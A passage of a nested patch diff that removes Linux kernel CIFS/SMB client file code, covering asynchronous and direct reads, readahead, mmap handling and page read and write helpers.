+-			list_add_tail(&rdata->list, rdata_list);
+-			return 0;
+-		}
+-
+-		/* Roll back credits and retry if needed */
+-		add_credits_and_wake_if(server, &rdata->credits, 0);
+-	} while (rc == -EAGAIN);
+-
+-fail:
+-	kref_put(&rdata->refcount, cifs_uncached_readdata_release);
+-	return rc;
+-}
+-
+-static int
+-cifs_send_async_read(loff_t offset, size_t len, struct cifsFileInfo *open_file,
+-		     struct cifs_sb_info *cifs_sb, struct list_head *rdata_list,
+-		     struct cifs_aio_ctx *ctx)
+-{
+-	struct cifs_readdata *rdata;
+-	unsigned int npages, rsize;
+-	struct cifs_credits credits_on_stack;
+-	struct cifs_credits *credits = &credits_on_stack;
+-	size_t cur_len;
+-	int rc;
+-	pid_t pid;
+-	struct TCP_Server_Info *server;
+-	struct page **pagevec;
+-	size_t start;
+-	struct iov_iter direct_iov = ctx->iter;
+-
+-	server = cifs_pick_channel(tlink_tcon(open_file->tlink)->ses);
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
+-		pid = open_file->pid;
+-	else
+-		pid = current->tgid;
+-
+-	if (ctx->direct_io)
+-		iov_iter_advance(&direct_iov, offset - ctx->pos);
+-
+-	do {
+-		if (open_file->invalidHandle) {
+-			rc = cifs_reopen_file(open_file, true);
+-			if (rc == -EAGAIN)
+-				continue;
+-			else if (rc)
+-				break;
+-		}
+-
+-		if (cifs_sb->ctx->rsize == 0)
+-			cifs_sb->ctx->rsize =
+-				server->ops->negotiate_rsize(tlink_tcon(open_file->tlink),
+-							     cifs_sb->ctx);
+-
+-		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->rsize,
+-						   &rsize, credits);
+-		if (rc)
+-			break;
+-
+-		cur_len = min_t(const size_t, len, rsize);
+-
+-		if (ctx->direct_io) {
+-			ssize_t result;
+-
+-			result = iov_iter_get_pages_alloc2(
+-					&direct_iov, &pagevec,
+-					cur_len, &start);
+-			if (result < 0) {
+-				cifs_dbg(VFS,
+-					 "Couldn't get user pages (rc=%zd) iter type %d iov_offset %zd count %zd\n",
+-					 result, iov_iter_type(&direct_iov),
+-					 direct_iov.iov_offset,
+-					 direct_iov.count);
+-				dump_stack();
+-
+-				rc = result;
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-			cur_len = (size_t)result;
+-
+-			rdata = cifs_readdata_direct_alloc(
+-					pagevec, cifs_uncached_readv_complete);
+-			if (!rdata) {
+-				add_credits_and_wake_if(server, credits, 0);
+-				rc = -ENOMEM;
+-				break;
+-			}
+-
+-			npages = (cur_len + start + PAGE_SIZE-1) / PAGE_SIZE;
+-			rdata->page_offset = start;
+-			rdata->tailsz = npages > 1 ?
+-				cur_len-(PAGE_SIZE-start)-(npages-2)*PAGE_SIZE :
+-				cur_len;
+-
+-		} else {
+-
+-			npages = DIV_ROUND_UP(cur_len, PAGE_SIZE);
+-			/* allocate a readdata struct */
+-			rdata = cifs_readdata_alloc(npages,
+-					    cifs_uncached_readv_complete);
+-			if (!rdata) {
+-				add_credits_and_wake_if(server, credits, 0);
+-				rc = -ENOMEM;
+-				break;
+-			}
+-
+-			rc = cifs_read_allocate_pages(rdata, npages);
+-			if (rc) {
+-				kvfree(rdata->pages);
+-				kfree(rdata);
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-
+-			rdata->tailsz = PAGE_SIZE;
+-		}
+-
+-		rdata->server = server;
+-		rdata->cfile = cifsFileInfo_get(open_file);
+-		rdata->nr_pages = npages;
+-		rdata->offset = offset;
+-		rdata->bytes = cur_len;
+-		rdata->pid = pid;
+-		rdata->pagesz = PAGE_SIZE;
+-		rdata->read_into_pages = cifs_uncached_read_into_pages;
+-		rdata->copy_into_pages = cifs_uncached_copy_into_pages;
+-		rdata->credits = credits_on_stack;
+-		rdata->ctx = ctx;
+-		kref_get(&ctx->refcount);
+-
+-		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
+-
+-		if (!rc) {
+-			if (rdata->cfile->invalidHandle)
+-				rc = -EAGAIN;
+-			else
+-				rc = server->ops->async_readv(rdata);
+-		}
+-
+-		if (rc) {
+-			add_credits_and_wake_if(server, &rdata->credits, 0);
+-			kref_put(&rdata->refcount,
+-				cifs_uncached_readdata_release);
+-			if (rc == -EAGAIN) {
+-				iov_iter_revert(&direct_iov, cur_len);
+-				continue;
+-			}
+-			break;
+-		}
+-
+-		list_add_tail(&rdata->list, rdata_list);
+-		offset += cur_len;
+-		len -= cur_len;
+-	} while (len > 0);
+-
+-	return rc;
+-}
+-
+-static void
+-collect_uncached_read_data(struct cifs_aio_ctx *ctx)
+-{
+-	struct cifs_readdata *rdata, *tmp;
+-	struct iov_iter *to = &ctx->iter;
+-	struct cifs_sb_info *cifs_sb;
+-	int rc;
+-
+-	cifs_sb = CIFS_SB(ctx->cfile->dentry->d_sb);
+-
+-	mutex_lock(&ctx->aio_mutex);
+-
+-	if (list_empty(&ctx->list)) {
+-		mutex_unlock(&ctx->aio_mutex);
+-		return;
+-	}
+-
+-	rc = ctx->rc;
+-	/* the loop below should proceed in the order of increasing offsets */
+-again:
+-	list_for_each_entry_safe(rdata, tmp, &ctx->list, list) {
+-		if (!rc) {
+-			if (!try_wait_for_completion(&rdata->done)) {
+-				mutex_unlock(&ctx->aio_mutex);
+-				return;
+-			}
+-
+-			if (rdata->result == -EAGAIN) {
+-				/* resend call if it's a retryable error */
+-				struct list_head tmp_list;
+-				unsigned int got_bytes = rdata->got_bytes;
+-
+-				list_del_init(&rdata->list);
+-				INIT_LIST_HEAD(&tmp_list);
+-
+-				/*
+-				 * Got a part of data and then reconnect has
+-				 * happened -- fill the buffer and continue
+-				 * reading.
+-				 */
+-				if (got_bytes && got_bytes < rdata->bytes) {
+-					rc = 0;
+-					if (!ctx->direct_io)
+-						rc = cifs_readdata_to_iov(rdata, to);
+-					if (rc) {
+-						kref_put(&rdata->refcount,
+-							cifs_uncached_readdata_release);
+-						continue;
+-					}
+-				}
+-
+-				if (ctx->direct_io) {
+-					/*
+-					 * Re-use rdata as this is a
+-					 * direct I/O
+-					 */
+-					rc = cifs_resend_rdata(
+-						rdata,
+-						&tmp_list, ctx);
+-				} else {
+-					rc = cifs_send_async_read(
+-						rdata->offset + got_bytes,
+-						rdata->bytes - got_bytes,
+-						rdata->cfile, cifs_sb,
+-						&tmp_list, ctx);
+-
+-					kref_put(&rdata->refcount,
+-						cifs_uncached_readdata_release);
+-				}
+-
+-				list_splice(&tmp_list, &ctx->list);
+-
+-				goto again;
+-			} else if (rdata->result)
+-				rc = rdata->result;
+-			else if (!ctx->direct_io)
+-				rc = cifs_readdata_to_iov(rdata, to);
+-
+-			/* if there was a short read -- discard anything left */
+-			if (rdata->got_bytes && rdata->got_bytes < rdata->bytes)
+-				rc = -ENODATA;
+-
+-			ctx->total_len += rdata->got_bytes;
+-		}
+-		list_del_init(&rdata->list);
+-		kref_put(&rdata->refcount, cifs_uncached_readdata_release);
+-	}
+-
+-	if (!ctx->direct_io)
+-		ctx->total_len = ctx->len - iov_iter_count(to);
+-
+-	/* mask nodata case */
+-	if (rc == -ENODATA)
+-		rc = 0;
+-
+-	ctx->rc = (rc == 0) ? (ssize_t)ctx->total_len : rc;
+-
+-	mutex_unlock(&ctx->aio_mutex);
+-
+-	if (ctx->iocb && ctx->iocb->ki_complete)
+-		ctx->iocb->ki_complete(ctx->iocb, ctx->rc);
+-	else
+-		complete(&ctx->done);
+-}
+-
+-static ssize_t __cifs_readv(
+-	struct kiocb *iocb, struct iov_iter *to, bool direct)
+-{
+-	size_t len;
+-	struct file *file = iocb->ki_filp;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifsFileInfo *cfile;
+-	struct cifs_tcon *tcon;
+-	ssize_t rc, total_read = 0;
+-	loff_t offset = iocb->ki_pos;
+-	struct cifs_aio_ctx *ctx;
+-
+-	/*
+-	 * iov_iter_get_pages_alloc() doesn't work with ITER_KVEC,
+-	 * fall back to data copy read path
+-	 * this could be improved by getting pages directly in ITER_KVEC
+-	 */
+-	if (direct && iov_iter_is_kvec(to)) {
+-		cifs_dbg(FYI, "use non-direct cifs_user_readv for kvec I/O\n");
+-		direct = false;
+-	}
+-
+-	len = iov_iter_count(to);
+-	if (!len)
+-		return 0;
+-
+-	cifs_sb = CIFS_FILE_SB(file);
+-	cfile = file->private_data;
+-	tcon = tlink_tcon(cfile->tlink);
+-
+-	if (!tcon->ses->server->ops->async_readv)
+-		return -ENOSYS;
+-
+-	if ((file->f_flags & O_ACCMODE) == O_WRONLY)
+-		cifs_dbg(FYI, "attempting read on write only file instance\n");
+-
+-	ctx = cifs_aio_ctx_alloc();
+-	if (!ctx)
+-		return -ENOMEM;
+-
+-	ctx->cfile = cifsFileInfo_get(cfile);
+-
+-	if (!is_sync_kiocb(iocb))
+-		ctx->iocb = iocb;
+-
+-	if (user_backed_iter(to))
+-		ctx->should_dirty = true;
+-
+-	if (direct) {
+-		ctx->pos = offset;
+-		ctx->direct_io = true;
+-		ctx->iter = *to;
+-		ctx->len = len;
+-	} else {
+-		rc = setup_aio_ctx_iter(ctx, to, ITER_DEST);
+-		if (rc) {
+-			kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-			return rc;
+-		}
+-		len = ctx->len;
+-	}
+-
+-	if (direct) {
+-		rc = filemap_write_and_wait_range(file->f_inode->i_mapping,
+-						  offset, offset + len - 1);
+-		if (rc) {
+-			kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-			return -EAGAIN;
+-		}
+-	}
+-
+-	/* grab a lock here due to read response handlers can access ctx */
+-	mutex_lock(&ctx->aio_mutex);
+-
+-	rc = cifs_send_async_read(offset, len, cfile, cifs_sb, &ctx->list, ctx);
+-
+-	/* if at least one read request send succeeded, then reset rc */
+-	if (!list_empty(&ctx->list))
+-		rc = 0;
+-
+-	mutex_unlock(&ctx->aio_mutex);
+-
+-	if (rc) {
+-		kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-		return rc;
+-	}
+-
+-	if (!is_sync_kiocb(iocb)) {
+-		kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-		return -EIOCBQUEUED;
+-	}
+-
+-	rc = wait_for_completion_killable(&ctx->done);
+-	if (rc) {
+-		mutex_lock(&ctx->aio_mutex);
+-		ctx->rc = rc = -EINTR;
+-		total_read = ctx->total_len;
+-		mutex_unlock(&ctx->aio_mutex);
+-	} else {
+-		rc = ctx->rc;
+-		total_read = ctx->total_len;
+-	}
+-
+-	kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-
+-	if (total_read) {
+-		iocb->ki_pos += total_read;
+-		return total_read;
+-	}
+-	return rc;
+-}
+-
+-ssize_t cifs_direct_readv(struct kiocb *iocb, struct iov_iter *to)
+-{
+-	return __cifs_readv(iocb, to, true);
+-}
+-
+-ssize_t cifs_user_readv(struct kiocb *iocb, struct iov_iter *to)
+-{
+-	return __cifs_readv(iocb, to, false);
+-}
+-
+-ssize_t
+-cifs_strict_readv(struct kiocb *iocb, struct iov_iter *to)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifsFileInfo *cfile = (struct cifsFileInfo *)
+-						iocb->ki_filp->private_data;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	int rc = -EACCES;
+-
+-	/*
+-	 * In strict cache mode we need to read from the server all the time
+-	 * if we don't have level II oplock because the server can delay mtime
+-	 * change - so we can't make a decision about inode invalidating.
+-	 * And we can also fail with pagereading if there are mandatory locks
+-	 * on pages affected by this read but not on the region from pos to
+-	 * pos+len-1.
+-	 */
+-	if (!CIFS_CACHE_READ(cinode))
+-		return cifs_user_readv(iocb, to);
+-
+-	if (cap_unix(tcon->ses) &&
+-	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
+-	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
+-		return generic_file_read_iter(iocb, to);
+-
+-	/*
+-	 * We need to hold the sem to be sure nobody modifies lock list
+-	 * with a brlock that prevents reading.
+-	 */
+-	down_read(&cinode->lock_sem);
+-	if (!cifs_find_lock_conflict(cfile, iocb->ki_pos, iov_iter_count(to),
+-				     tcon->ses->server->vals->shared_lock_type,
+-				     0, NULL, CIFS_READ_OP))
+-		rc = generic_file_read_iter(iocb, to);
+-	up_read(&cinode->lock_sem);
+-	return rc;
+-}
+-
+-static ssize_t
+-cifs_read(struct file *file, char *read_data, size_t read_size, loff_t *offset)
+-{
+-	int rc = -EACCES;
+-	unsigned int bytes_read = 0;
+-	unsigned int total_read;
+-	unsigned int current_read_size;
+-	unsigned int rsize;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	unsigned int xid;
+-	char *cur_offset;
+-	struct cifsFileInfo *open_file;
+-	struct cifs_io_parms io_parms = {0};
+-	int buf_type = CIFS_NO_BUFFER;
+-	__u32 pid;
+-
+-	xid = get_xid();
+-	cifs_sb = CIFS_FILE_SB(file);
+-
+-	/* FIXME: set up handlers for larger reads and/or convert to async */
+-	rsize = min_t(unsigned int, cifs_sb->ctx->rsize, CIFSMaxBufSize);
+-
+-	if (file->private_data == NULL) {
+-		rc = -EBADF;
+-		free_xid(xid);
+-		return rc;
+-	}
+-	open_file = file->private_data;
+-	tcon = tlink_tcon(open_file->tlink);
+-	server = cifs_pick_channel(tcon->ses);
+-
+-	if (!server->ops->sync_read) {
+-		free_xid(xid);
+-		return -ENOSYS;
+-	}
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
+-		pid = open_file->pid;
+-	else
+-		pid = current->tgid;
+-
+-	if ((file->f_flags & O_ACCMODE) == O_WRONLY)
+-		cifs_dbg(FYI, "attempting read on write only file instance\n");
+-
+-	for (total_read = 0, cur_offset = read_data; read_size > total_read;
+-	     total_read += bytes_read, cur_offset += bytes_read) {
+-		do {
+-			current_read_size = min_t(uint, read_size - total_read,
+-						  rsize);
+-			/*
+-			 * For windows me and 9x we do not want to request more
+-			 * than it negotiated since it will refuse the read
+-			 * then.
+-			 */
+-			if (!(tcon->ses->capabilities &
+-				tcon->ses->server->vals->cap_large_files)) {
+-				current_read_size = min_t(uint,
+-					current_read_size, CIFSMaxBufSize);
+-			}
+-			if (open_file->invalidHandle) {
+-				rc = cifs_reopen_file(open_file, true);
+-				if (rc != 0)
+-					break;
+-			}
+-			io_parms.pid = pid;
+-			io_parms.tcon = tcon;
+-			io_parms.offset = *offset;
+-			io_parms.length = current_read_size;
+-			io_parms.server = server;
+-			rc = server->ops->sync_read(xid, &open_file->fid, &io_parms,
+-						    &bytes_read, &cur_offset,
+-						    &buf_type);
+-		} while (rc == -EAGAIN);
+-
+-		if (rc || (bytes_read == 0)) {
+-			if (total_read) {
+-				break;
+-			} else {
+-				free_xid(xid);
+-				return rc;
+-			}
+-		} else {
+-			cifs_stats_bytes_read(tcon, total_read);
+-			*offset += bytes_read;
+-		}
+-	}
+-	free_xid(xid);
+-	return total_read;
+-}
+-
+-/*
+- * If the page is mmap'ed into a process' page tables, then we need to make
+- * sure that it doesn't change while being written back.
+- */
+-static vm_fault_t
+-cifs_page_mkwrite(struct vm_fault *vmf)
+-{
+-	struct page *page = vmf->page;
+-
+-	/* Wait for the page to be written to the cache before we allow it to
+-	 * be modified.  We then assume the entire page will need writing back.
+-	 */
+-#ifdef CONFIG_CIFS_FSCACHE
+-	if (PageFsCache(page) &&
+-	    wait_on_page_fscache_killable(page) < 0)
+-		return VM_FAULT_RETRY;
+-#endif
+-
+-	wait_on_page_writeback(page);
+-
+-	if (lock_page_killable(page) < 0)
+-		return VM_FAULT_RETRY;
+-	return VM_FAULT_LOCKED;
+-}
+-
+-static const struct vm_operations_struct cifs_file_vm_ops = {
+-	.fault = filemap_fault,
+-	.map_pages = filemap_map_pages,
+-	.page_mkwrite = cifs_page_mkwrite,
+-};
+-
+-int cifs_file_strict_mmap(struct file *file, struct vm_area_struct *vma)
+-{
+-	int xid, rc = 0;
+-	struct inode *inode = file_inode(file);
+-
+-	xid = get_xid();
+-
+-	if (!CIFS_CACHE_READ(CIFS_I(inode)))
+-		rc = cifs_zap_mapping(inode);
+-	if (!rc)
+-		rc = generic_file_mmap(file, vma);
+-	if (!rc)
+-		vma->vm_ops = &cifs_file_vm_ops;
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-int cifs_file_mmap(struct file *file, struct vm_area_struct *vma)
+-{
+-	int rc, xid;
+-
+-	xid = get_xid();
+-
+-	rc = cifs_revalidate_file(file);
+-	if (rc)
+-		cifs_dbg(FYI, "Validation prior to mmap failed, error=%d\n",
+-			 rc);
+-	if (!rc)
+-		rc = generic_file_mmap(file, vma);
+-	if (!rc)
+-		vma->vm_ops = &cifs_file_vm_ops;
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static void
+-cifs_readv_complete(struct work_struct *work)
+-{
+-	unsigned int i, got_bytes;
+-	struct cifs_readdata *rdata = container_of(work,
+-						struct cifs_readdata, work);
+-
+-	got_bytes = rdata->got_bytes;
+-	for (i = 0; i < rdata->nr_pages; i++) {
+-		struct page *page = rdata->pages[i];
+-
+-		if (rdata->result == 0 ||
+-		    (rdata->result == -EAGAIN && got_bytes)) {
+-			flush_dcache_page(page);
+-			SetPageUptodate(page);
+-		} else
+-			SetPageError(page);
+-
+-		if (rdata->result == 0 ||
+-		    (rdata->result == -EAGAIN && got_bytes))
+-			cifs_readpage_to_fscache(rdata->mapping->host, page);
+-
+-		unlock_page(page);
+-
+-		got_bytes -= min_t(unsigned int, PAGE_SIZE, got_bytes);
+-
+-		put_page(page);
+-		rdata->pages[i] = NULL;
+-	}
+-	kref_put(&rdata->refcount, cifs_readdata_release);
+-}
+-
+-static int
+-readpages_fill_pages(struct TCP_Server_Info *server,
+-		     struct cifs_readdata *rdata, struct iov_iter *iter,
+-		     unsigned int len)
+-{
+-	int result = 0;
+-	unsigned int i;
+-	u64 eof;
+-	pgoff_t eof_index;
+-	unsigned int nr_pages = rdata->nr_pages;
+-	unsigned int page_offset = rdata->page_offset;
+-
+-	/* determine the eof that the server (probably) has */
+-	eof = CIFS_I(rdata->mapping->host)->server_eof;
+-	eof_index = eof ? (eof - 1) >> PAGE_SHIFT : 0;
+-	cifs_dbg(FYI, "eof=%llu eof_index=%lu\n", eof, eof_index);
+-
+-	rdata->got_bytes = 0;
+-	rdata->tailsz = PAGE_SIZE;
+-	for (i = 0; i < nr_pages; i++) {
+-		struct page *page = rdata->pages[i];
+-		unsigned int to_read = rdata->pagesz;
+-		size_t n;
+-
+-		if (i == 0)
+-			to_read -= page_offset;
+-		else
+-			page_offset = 0;
+-
+-		n = to_read;
+-
+-		if (len >= to_read) {
+-			len -= to_read;
+-		} else if (len > 0) {
+-			/* enough for partial page, fill and zero the rest */
+-			zero_user(page, len + page_offset, to_read - len);
+-			n = rdata->tailsz = len;
+-			len = 0;
+-		} else if (page->index > eof_index) {
+-			/*
+-			 * The VFS will not try to do readahead past the
+-			 * i_size, but it's possible that we have outstanding
+-			 * writes with gaps in the middle and the i_size hasn't
+-			 * caught up yet. Populate those with zeroed out pages
+-			 * to prevent the VFS from repeatedly attempting to
+-			 * fill them until the writes are flushed.
+-			 */
+-			zero_user(page, 0, PAGE_SIZE);
+-			flush_dcache_page(page);
+-			SetPageUptodate(page);
+-			unlock_page(page);
+-			put_page(page);
+-			rdata->pages[i] = NULL;
+-			rdata->nr_pages--;
+-			continue;
+-		} else {
+-			/* no need to hold page hostage */
+-			unlock_page(page);
+-			put_page(page);
+-			rdata->pages[i] = NULL;
+-			rdata->nr_pages--;
+-			continue;
+-		}
+-
+-		if (iter)
+-			result = copy_page_from_iter(
+-					page, page_offset, n, iter);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-		else if (rdata->mr)
+-			result = n;
+-#endif
+-		else
+-			result = cifs_read_page_from_socket(
+-					server, page, page_offset, n);
+-		if (result < 0)
+-			break;
+-
+-		rdata->got_bytes += result;
+-	}
+-
+-	return result != -ECONNABORTED && rdata->got_bytes > 0 ?
+-						rdata->got_bytes : result;
+-}
+-
+-static int
+-cifs_readpages_read_into_pages(struct TCP_Server_Info *server,
+-			       struct cifs_readdata *rdata, unsigned int len)
+-{
+-	return readpages_fill_pages(server, rdata, NULL, len);
+-}
+-
+-static int
+-cifs_readpages_copy_into_pages(struct TCP_Server_Info *server,
+-			       struct cifs_readdata *rdata,
+-			       struct iov_iter *iter)
+-{
+-	return readpages_fill_pages(server, rdata, iter, iter->count);
+-}
+-
+-static void cifs_readahead(struct readahead_control *ractl)
+-{
+-	int rc;
+-	struct cifsFileInfo *open_file = ractl->file->private_data;
+-	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(ractl->file);
+-	struct TCP_Server_Info *server;
+-	pid_t pid;
+-	unsigned int xid, nr_pages, last_batch_size = 0, cache_nr_pages = 0;
+-	pgoff_t next_cached = ULONG_MAX;
+-	bool caching = fscache_cookie_enabled(cifs_inode_cookie(ractl->mapping->host)) &&
+-		cifs_inode_cookie(ractl->mapping->host)->cache_priv;
+-	bool check_cache = caching;
+-
+-	xid = get_xid();
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
+-		pid = open_file->pid;
+-	else
+-		pid = current->tgid;
+-
+-	rc = 0;
+-	server = cifs_pick_channel(tlink_tcon(open_file->tlink)->ses);
+-
+-	cifs_dbg(FYI, "%s: file=%p mapping=%p num_pages=%u\n",
+-		 __func__, ractl->file, ractl->mapping, readahead_count(ractl));
+-
+-	/*
+-	 * Chop the readahead request up into rsize-sized read requests.
+-	 */
+-	while ((nr_pages = readahead_count(ractl) - last_batch_size)) {
+-		unsigned int i, got, rsize;
+-		struct page *page;
+-		struct cifs_readdata *rdata;
+-		struct cifs_credits credits_on_stack;
+-		struct cifs_credits *credits = &credits_on_stack;
+-		pgoff_t index = readahead_index(ractl) + last_batch_size;
+-
+-		/*
+-		 * Find out if we have anything cached in the range of
+-		 * interest, and if so, where the next chunk of cached data is.
+-		 */
+-		if (caching) {
+-			if (check_cache) {
+-				rc = cifs_fscache_query_occupancy(
+-					ractl->mapping->host, index, nr_pages,
+-					&next_cached, &cache_nr_pages);
+-				if (rc < 0)
+-					caching = false;
+-				check_cache = false;
+-			}
+-
+-			if (index == next_cached) {
+-				/*
+-				 * TODO: Send a whole batch of pages to be read
+-				 * by the cache.
+-				 */
+-				struct folio *folio = readahead_folio(ractl);
+-
+-				last_batch_size = folio_nr_pages(folio);
+-				if (cifs_readpage_from_fscache(ractl->mapping->host,
+-							       &folio->page) < 0) {
+-					/*
+-					 * TODO: Deal with cache read failure
+-					 * here, but for the moment, delegate
+-					 * that to readpage.
+-					 */
+-					caching = false;
+-				}
+-				folio_unlock(folio);
+-				next_cached++;
+-				cache_nr_pages--;
+-				if (cache_nr_pages == 0)
+-					check_cache = true;
+-				continue;
+-			}
+-		}
+-
+-		if (open_file->invalidHandle) {
+-			rc = cifs_reopen_file(open_file, true);
+-			if (rc) {
+-				if (rc == -EAGAIN)
+-					continue;
+-				break;
+-			}
+-		}
+-
+-		if (cifs_sb->ctx->rsize == 0)
+-			cifs_sb->ctx->rsize =
+-				server->ops->negotiate_rsize(tlink_tcon(open_file->tlink),
+-							     cifs_sb->ctx);
+-
+-		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->rsize,
+-						   &rsize, credits);
+-		if (rc)
+-			break;
+-		nr_pages = min_t(size_t, rsize / PAGE_SIZE, readahead_count(ractl));
+-		nr_pages = min_t(size_t, nr_pages, next_cached - index);
+-
+-		/*
+-		 * Give up immediately if rsize is too small to read an entire
+-		 * page. The VFS will fall back to readpage. We should never
+-		 * reach this point however since we set ra_pages to 0 when the
+-		 * rsize is smaller than a cache page.
+-		 */
+-		if (unlikely(!nr_pages)) {
+-			add_credits_and_wake_if(server, credits, 0);
+-			break;
+-		}
+-
+-		rdata = cifs_readdata_alloc(nr_pages, cifs_readv_complete);
+-		if (!rdata) {
+-			/* best to give up if we're out of mem */
+-			add_credits_and_wake_if(server, credits, 0);
+-			break;
+-		}
+-
+-		got = __readahead_batch(ractl, rdata->pages, nr_pages);
+-		if (got != nr_pages) {
+-			pr_warn("__readahead_batch() returned %u/%u\n",
+-				got, nr_pages);
+-			nr_pages = got;
+-		}
+-
+-		rdata->nr_pages = nr_pages;
+-		rdata->bytes	= readahead_batch_length(ractl);
+-		rdata->cfile	= cifsFileInfo_get(open_file);
+-		rdata->server	= server;
+-		rdata->mapping	= ractl->mapping;
+-		rdata->offset	= readahead_pos(ractl);
+-		rdata->pid	= pid;
+-		rdata->pagesz	= PAGE_SIZE;
+-		rdata->tailsz	= PAGE_SIZE;
+-		rdata->read_into_pages = cifs_readpages_read_into_pages;
+-		rdata->copy_into_pages = cifs_readpages_copy_into_pages;
+-		rdata->credits	= credits_on_stack;
+-
+-		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
+-		if (!rc) {
+-			if (rdata->cfile->invalidHandle)
+-				rc = -EAGAIN;
+-			else
+-				rc = server->ops->async_readv(rdata);
+-		}
+-
+-		if (rc) {
+-			add_credits_and_wake_if(server, &rdata->credits, 0);
+-			for (i = 0; i < rdata->nr_pages; i++) {
+-				page = rdata->pages[i];
+-				unlock_page(page);
+-				put_page(page);
+-			}
+-			/* Fallback to the readpage in error/reconnect cases */
+-			kref_put(&rdata->refcount, cifs_readdata_release);
+-			break;
+-		}
+-
+-		kref_put(&rdata->refcount, cifs_readdata_release);
+-		last_batch_size = nr_pages;
+-	}
+-
+-	free_xid(xid);
+-}
+-
+-/*
+- * cifs_readpage_worker must be called with the page pinned
+- */
+-static int cifs_readpage_worker(struct file *file, struct page *page,
+-	loff_t *poffset)
+-{
+-	char *read_data;
+-	int rc;
+-
+-	/* Is the page cached? */
+-	rc = cifs_readpage_from_fscache(file_inode(file), page);
+-	if (rc == 0)
+-		goto read_complete;
+-
+-	read_data = kmap(page);
+-	/* for reads over a certain size could initiate async read ahead */
+-
+-	rc = cifs_read(file, read_data, PAGE_SIZE, poffset);
+-
+-	if (rc < 0)
+-		goto io_error;
+-	else
+-		cifs_dbg(FYI, "Bytes read %d\n", rc);
+-
+-	/* we do not want atime to be less than mtime, it broke some apps */
+-	file_inode(file)->i_atime = current_time(file_inode(file));
+-	if (timespec64_compare(&(file_inode(file)->i_atime), &(file_inode(file)->i_mtime)))
+-		file_inode(file)->i_atime = file_inode(file)->i_mtime;
+-	else
+-		file_inode(file)->i_atime = current_time(file_inode(file));
+-
+-	if (PAGE_SIZE > rc)
+-		memset(read_data + rc, 0, PAGE_SIZE - rc);
+-
+-	flush_dcache_page(page);
+-	SetPageUptodate(page);
+-
+-	/* send this page to the cache */
+-	cifs_readpage_to_fscache(file_inode(file), page);
+-
+-	rc = 0;
+-
+-io_error:
+-	kunmap(page);
+-	unlock_page(page);
+-
+-read_complete:
+-	return rc;
+-}
+-
+-static int cifs_read_folio(struct file *file, struct folio *folio)
+-{
+-	struct page *page = &folio->page;
+-	loff_t offset = page_file_offset(page);
+-	int rc = -EACCES;
+-	unsigned int xid;
+-
+-	xid = get_xid();
+-
+-	if (file->private_data == NULL) {
+-		rc = -EBADF;
+-		free_xid(xid);
+-		return rc;
+-	}
+-
+-	cifs_dbg(FYI, "read_folio %p at offset %d 0x%x\n",
+-		 page, (int)offset, (int)offset);
+-
+-	rc = cifs_readpage_worker(file, page, &offset);
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static int is_inode_writable(struct cifsInodeInfo *cifs_inode)
+-{
+-	struct cifsFileInfo *open_file;
+-
+-	spin_lock(&cifs_inode->open_file_lock);
+-	list_for_each_entry(open_file, &cifs_inode->openFileList, flist) {
+-		if (OPEN_FMODE(open_file->f_flags) & FMODE_WRITE) {
+-			spin_unlock(&cifs_inode->open_file_lock);
+-			return 1;
+-		}
+-	}
+-	spin_unlock(&cifs_inode->open_file_lock);
+-	return 0;
+-}
+-
+-/* We do not want to update the file size from server for inodes
+-   open for write - to avoid races with writepage extending
+-   the file - in the future we could consider allowing
+-   refreshing the inode only on increases in the file size
+-   but this is tricky to do without racing with writebehind
+-   page caching in the current Linux kernel design */
+-bool is_size_safe_to_change(struct cifsInodeInfo *cifsInode, __u64 end_of_file)
+-{
+-	if (!cifsInode)
+-		return true;
+-
+-	if (is_inode_writable(cifsInode)) {
+-		/* This inode is open for write at least once */
+-		struct cifs_sb_info *cifs_sb;
+-
+-		cifs_sb = CIFS_SB(cifsInode->netfs.inode.i_sb);
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DIRECT_IO) {
+-			/* since no page cache to corrupt on directio
+-			we can change size safely */
+-			return true;
+-		}
+-
+-		if (i_size_read(&cifsInode->netfs.inode) < end_of_file)
+-			return true;
+-
+-		return false;
+-	} else
+-		return true;
+-}
+-
+-static int cifs_write_begin(struct file *file, struct address_space *mapping,
+-			loff_t pos, unsigned len,
+-			struct page **pagep, void **fsdata)
+-{
+-	int oncethru = 0;
+-	pgoff_t index = pos >> PAGE_SHIFT;
+-	loff_t offset = pos & (PAGE_SIZE - 1);
+-	loff_t page_start = pos & PAGE_MASK;
+-	loff_t i_size;
+-	struct page *page;
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "write_begin from %lld len %d\n", (long long)pos, len);
+-
+-start:
+-	page = grab_cache_page_write_begin(mapping, index);
+-	if (!page) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	if (PageUptodate(page))
+-		goto out;
+-
+-	/*
